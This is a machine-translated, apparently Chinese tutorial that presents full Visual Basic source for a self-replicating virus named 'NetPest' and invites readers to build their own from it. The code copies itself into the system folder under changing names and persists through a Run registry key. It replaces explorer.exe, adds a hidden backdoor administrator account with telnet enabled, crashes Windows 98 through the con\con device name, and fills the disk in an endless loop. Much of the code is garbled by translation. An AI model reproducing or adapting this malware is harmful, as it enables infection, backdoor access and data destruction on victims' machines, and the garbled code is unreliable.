VB series with the virus idea is flexible, this thing is the majority of action in the completion of the module inside ~
Thinking: Since the virus to enter ~ Well, this procedure must be relentless! Thief! Cunning you would like to also like the spread of plague! Then a very successful virus is the need to hide the file name first began to ~
It is necessary to continuously change the file name to start each virus is to change the file name to then come to rely on time-of course, you can use other random value to the not very reliable! First module code:
\ 'Module for this operation from the file name
Public Function PestName1 () As String
PestYeMoDay = Left $ (Now, 10)
PestMoYe = Left $ (Now, 7)
Right PestS = $ (Now, 2)
Right PestHMS = $ (Now, 8)
PestYear = Left $ (PestMoYe, 4)
PestYear2 = Right ($ PestYear, 2)
PestMouse = Right ($ PestMoYe, 2)
PestDay = Right ($ PestYeMoDay, 2)
PestMS = Right ($ PestHMS, 5)
PestM = Left $ (PestMS, 2)
PestH = Left $ (PestHMS, 2)
End Function
This is a document of their own code of ~ ~ how slowly analysis of the accession process you do not you will not even tell ah ~..... difficult to say hey ~ ~ or ~ point that the integrity of the form inside accession
PestName1
Can you simple ~ ~
This is the code in the file name ~
On the ~ ~ I still have all the variables are first brought ~ ~ course is in a module inside ~
\ 'The module used to store all the variables.
Public PestAdd As String
Public PestReLog As String
Public PestAdAdd As String
Public PestLogBKAD As String
Public PestReBKLog As String
Public PestLogPass As Boolean
Public PestReB1Log As String
Public PestLogBK2AD As String
Public PestLogBK1AD As String
Public PestReB2Log As String
Public lujing As String \ 'path definition of the variables.
Public PestZLJ As String \ 'definition of the entire path variables.
Public PestName As String
Public PestMS As String
Public PestS As String
Public PestH As String
Public PestM As String
Public PestHz As String
Public PestMouse As String
Public PestYear As String
Public PestDay As String
Public PestMoYe As String
Public PestMoDay As String
Public PestYeMoDay As String
Public PestYear2 As String
Public PestReFirst As String
Public PestFirst As Boolean
Public PestWin As String
Almost on the file name followed by a self-replicating ~ ~
We must first copied to a safe place no nonsense here ~ ~ let you automatically find the System folder path to the code below:
\ 'This is the View system path inside the code. Call is Pestlj
Option Explicit
Public PestAddress As String
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public PestAddress2 As String
Private Declare Function GetTickCount Lib "kernel32" () As Long
Public Function PestAddress1 () As String
On Error Resume Next
Dim len5 As Long
PestAddress = String (255, 0)
Len5 = GetSystemDirectory (PestAddress, 256)
PestAddress = Left (PestAddress, InStr (1, PestAddress, Chr (0)) - 1)
PestAddress2 = Left (PestAddress, InStrRev (PestAddress, "\ \") - 1)
End Function
Notes has been said to call the Pestlj.
Then again in the integrity of the document path to the code below:
Lujing App.Path + = "\ \" + + App.EXEName. "Exe" \ 'search and access to the integrity of the document path.
Well to find that the following have been published to begin copying ~
FileCopy lujing, PestAdd
OK to copy ready! Then to the registry has been used to the path of a module but also to the code below:
\ 'The module dedicated to the registry into
Option Explicit
Private Declare Function RegCreateKey & Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey &, ByVal lpszSubKey $ lphKey &)
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Const HKEY_LOCAL_MACHINE = & H80000002
Const REG_SZ = 1
Dim Pos \ 'As POINTAPI
Dim Prev \ 'As POINTAPI
Dim r As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Const SW_HIDE = 0
Const SW_SHOWNORMAL = 1
Public Function PestRun1 ()
\ 'R = GetCursorPos (Pos)
Dim sKeyName As String, sKeyValue As String, sKeyValueIcon As String
Dim Ret As Integer, lphKey As Long
SKeyName = "Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run"
SKeyValue = PestAddress & IIf (Len (App.Path)> 3, "\ \" & & PestName "." & PestHz, "Windll")
Ret = RegCreateKey & (HKEY_LOCAL_MACHINE, sKeyName, lphKey)
Ret = RegSetValue & (lphKey &, "", REG_SZ, sKeyValue, 0 &)
End Function
Need only write when the call
PestRun1
Can you ~
Then what is it is the ................. it is ~!! That's right! !!!!!!! He is the place to crafty!
Not only does it change the file name each time you start but also to detect whether any of its suspected of being a document! Or modify! Then used a log!, And so on the paper ~ ~ ~
The entire log of code as follows:
\ 'The module used for reading and writing log to find the last document, log operation .....
Public Function PestLog1 () \ 'this process is normal log NOTE: This log is very important.
On Error Resume Next
Open (PestAddress & "\ \ Winlog.dll") For Output As # 1
Print # 1, PestAdd
Close # 1
End Function
Public Function PestLogBK1 () \ 'into the backup log to prevent deletion.
On Error Resume Next
PestLogBKAD = Left $ (PestAddress, 10)
Open (PestLogBKAD & "\ \ Desktop.dll") For Output As # 3 \ 'write to the Windows directory.
Print # 3, PestAdd
Close # 3
End Function
Public Function PestReadlog1 () \ 'normal reading log.
Open (PestAddress & "\ \ Winlog.dll") For Input As # 2
Input # 2, PestReLog
Close # 2
End Function
Public Function PestReadlogBK1 () \ 'read backup log
On Error Resume Next
PestLogBKAD = Left $ (PestAddress, 10)
Open (PestLogBKAD & "\ \ Desktop.dll") For Input As # 4
Input # 4, PestReBKLog
Close # 4
End Function
Public Function PestReadlogBK2 () \ 'read backup log 2
On Error Resume Next
PestLogBK2AD = Left $ (PestAddress, 17)
Open (PestLogBK2AD & "\ \ CDROOM.drv") For Input As # 5
Input # 5, PestReB1Log
Close # 5
End Function
Public Function PestLogBK2 () \ 'backup log into 2 to prevent deletion.
On Error Resume Next
PestLogBK2AD = Left $ (PestAddress, 17)
Open (PestLogBK2AD & "\ \ CDROOM.drv") For Output As # 3 \ 'write to the System directory.
Print # 3, PestAdd
Close # 3
End Function
Public Function PestLogPass1 () \ 'verify whether the log was damaged.
On Error GoTo N1
If PestReLog = = PestReBKLog And PestReLog PestReB1Log And PestReBKLog = PestReB1Log Then
PestLogPass = True
Else
N1:
PestLogPass = False
End If
End Function
Public Function PestReFirst1 () \ 'test is the first time the process is running.
On Error GoTo N1
Open (PestAddress & "\ \ PestFirst.ocx") For Input As # 1
Input # 1, PestReFirst
Close # 1
If PestReFirst <> "" Then
If PestReFirst = "dff7184f4813ab81" Then
PestDelFirst1 \ 'removal marks.
PestFirst = True
Else
PestFirst = False
End If
Else
N1:
PestFirst = False
End If
End Function
Public Function PestWriFirst1 () \ 'written message that the procedure is not the first run.
Open (PestAddress & "\ \ PestFirst.ocx") For Output As # 1
Print # 1, "dff7184f4813ab81"
Close # 1
End Function
Public Function PestBackExe () \ 'Roy document
Open (PestAddress & "\ \ CPU NetPest.exe") For Output As # 1
Print # 1, "Computer29 Http: / / www.computer29.com"
Print # 1, "Your computer have NetPest"
Close # 1
End Function
Public Function PestExeJunk () \ 'documents were damaged
On Error Resume Next
PestLogErr1 \ 'attacks, sabotage
If PestWin9x = Win2k Then
GoTo N1
N1:
PestDoor1
Else
Shell "C: \ \ con \ \ con" vbHide
End If
PestDiskKill \ 'drive the implementation of garbage
End Function
See
Shell "C: \ \ con \ \ con" vbHide
? Oh! Attack WIN98 vbHide of this function is to hide running!
This module is mainly inspection documents suspected of being damaged or damage ~ ~ Once on the implementation of the damage to delete EX ******. FORMAT intend to increase the ~ ~ But a too **
Under a code modules as follows:
\ 'The module for the document to delete
Public Function PestDel1 ()
Open (PestAddress & "\ \ Pest.bat") For Output As # 1
Print # 1, "del" & "" & PestReLog
Print # 1, "del" & "" & & PestAddress "\ \ Pest.bat"
Close # 1
Shell PestAddress & "\ \ Pest.bat" vbHide
End Function
Public Function PestDelFirst1 () \ 'Delete the first run-off information.
Open (PestAddress & "\ \ Windows.dll.bat") For Output As # 1
Print # 1, "del" & "" & PestReLog
Print # 1, "del" & "" & & PestAddress "\ \ PestFirst.ocx"
Close # 1
Shell PestAddress & "\ \ Windows.dll.bat" vbHide
End Function
To delete the log ~
Next is relentless to the code below:
\ 'The module used for destructive code.
Public Function PestLogErr1 () \ 'in the log of this process is wrong circumstances of the call.
On Error GoTo N1
\ 'Open (PestLogBKAD & "\ \" & "explorer.exe") For Output As # 9
\ 'Print # 9, "The Game Is Over! We \' re NetPest!"
\ 'Close # 9
If PestLogPass = False Then \ 'If the log is damaged, then replace explorer document.
FileCopy lujing, PestLogBKAD & "\ \" & "explorer.exe"
End If
N1:
\ 'Here to join the process of closing explorer code.
FileCopy lujing, PestLogBKAD & "\ \" & "explorer.exe" \ 'try to replace.
End
On Error GoTo N2 \ 'if it is wrong, a pilot phase to the next.
N2:
Open (PestLogBKAD & "\ \ winstat.bat") For Output As # 1
Print # 1, "del" & "" & & PestLogBKAD "\ \" & "explorer.exe"
Print # 1, "copy" & "" & lujing & "" & & PestLogBKAD "\ \" & "explorer.exe"
Close # 1
FileCopy lujing, PestLogBKAD & "\ \" & "explorer.exe" \ 'try to replace.
End
Shell "rundll.exe user.exe, exitwindowsexec" vbHide \ 'to restart your computer.
End Function
\ 'Backdoor for the following code
Public Function PestDoor1 ()
On Error Resume Next
Shell "net stop telnet," vbHide
Shell "net user Netpest Computer29 / add," vbHide
Shell "net localgroup administrators Netpest / add," vbHide
Shell "net start telnet," vbHide
End Function
Public Function PestWin9x () \ 'test for the X 9
On Error GoTo Win2k
Shell "C: \ \ con \ \ con" vbHide
Win2k:
PestWin = Win2k
End Function
Public Function PestDiskKill () \ 'drive garbage
PestDisk1:
On Error Resume Next
Open (PestAddress1 & "\ \ NetPest.CPU.Computer29.cpu") For Append As # 3 \ 'write to the Windows directory.
Print # 3, Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now
Print # 3, Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now Now & & & & Now Now Now
Close # 3
GoTo PestDisk1
End Function
Some things I did not also increase from the previous procedures too late to write again slumbered! So forget to now waiting for everyone to complete! Drives a garbage litter the speed very quickly! It produced a very large document! Course! You can also let him have a lot of small refuse ~
TU TU ~ ~ ~ basic on the next, I would like to give you to form code
\ 'CPU for the development of this procedure, the procedure using intelligent operation, automatically changes the name. Bring the other side to find software. Development time: October 27, 2004, 21:23 formal development.
Private Sub Form_Load ()
\'************************* Virus preparation phase ******************* *******************
On Error Resume Next
PestAddress1 \ 'read SYSTEM32 folder location.
PestName1 \ 'random call from the paper process.
PestHz = PestMouse & PestDay PestS & & & PestM. "Exe"
PestName = PestDay & PestM & PestYear2
Lujing App.Path + = "\ \" + + App.EXEName. "Exe" \ 'search and access to the integrity of the document path.
\ 'PestZLJ Pestlj & = "\ \" & & PestName "." & PestHz
\ 'PestCopy \' implementation of random paper copies.
PestReFirst1 \ 'testing procedures is the first test run .*********
If PestFirst = True Then
GoTo NetPest
Else
GoTo PestFirst
End If
NetPest:
PestReadlog1 \ 'read the last log.
PestReadlogBK1 \ 'backup log read, printed in the test data.
PestReadlogBK2 \ 'read backup log 2, printed in the test data.
PestLogPass1 \ 'log started verify whether been destroyed.
PestLogErr1 \ 'log started the destruction of the code. Testing ********
PestWin9x \ 'test for the Win9x is, if it is attacked test will be conducted CON ********
\'*************************** Here, virus activity began *************** ******************
PestFirst:
FileCopy lujing, PestAdd \ 'self-started breeding.
PestRun1 \ 'new document will be written into the registry.
PestDel1 \ 'Delete the last documents, and updated.
PestLog1 \ 'into the log.
PestLogBK1 \ 'into the backup log to verify.
PestLogBK2 \ 'into the backup log 2, security assurance procedures.
PestWriFirst1 \ 'operation, the information into the testing .*********
PestDoor1 \ 'leave the back door
PestBackExe \ 'cunning detection test document *********
End Sub
Private Sub Form_Unload (Cancel As Integer)
On Error Resume Next
PestAddress1 \ 'read SYSTEM32 folder location.
PestName1 \ 'random call from the paper process.
PestHz = PestMouse & PestDay PestS & & & PestM. "Exe"
PestName = PestDay & PestM & PestYear2
Lujing App.Path + = "\ \" + + App.EXEName. "Exe" \ 'search and access to the integrity of the document path.
\ 'PestZLJ Pestlj & = "\ \" & & PestName "." & PestHz
\ 'PestCopy \' implementation of random paper copies.
PestReFirst1 \ 'testing procedures is the first test run .*********
If PestFirst = True Then
GoTo NetPest
Else
GoTo PestFirst
End If
NetPest:
PestReadlog1 \ 'read the last log.
PestReadlogBK1 \ 'backup log read, printed in the test data.
PestReadlogBK2 \ 'read backup log 2, printed in the test data.
PestLogPass1 \ 'log started verify whether been destroyed.
PestLogErr1 \ 'log started the destruction of the code. Testing ********
\'*************************** Here, virus activity began *************** ******************
PestFirst:
FileCopy lujing, PestAdd \ 'self-started breeding.
PestRun1 \ 'new document will be written into the registry.
PestDel1 \ 'Delete the last documents, and updated.
PestLog1 \ 'into the log.
PestLogBK1 \ 'into the backup log to verify.
PestLogBK2 \ 'into the backup log 2, security assurance procedures.
PestWriFirst1 \ 'operation, the information into the testing .*********
End Sub
Insert some of the process and I have not come ~ ~ we Haolei ah! With an asterisk to indicate test is not very stable ~ ~ Oh, OK! On these! If you use my ideas developed virus to remember to thank my oh Ha ha! people are interested in and I can also exchange some ~ of course! master Pleased to meet you -- |
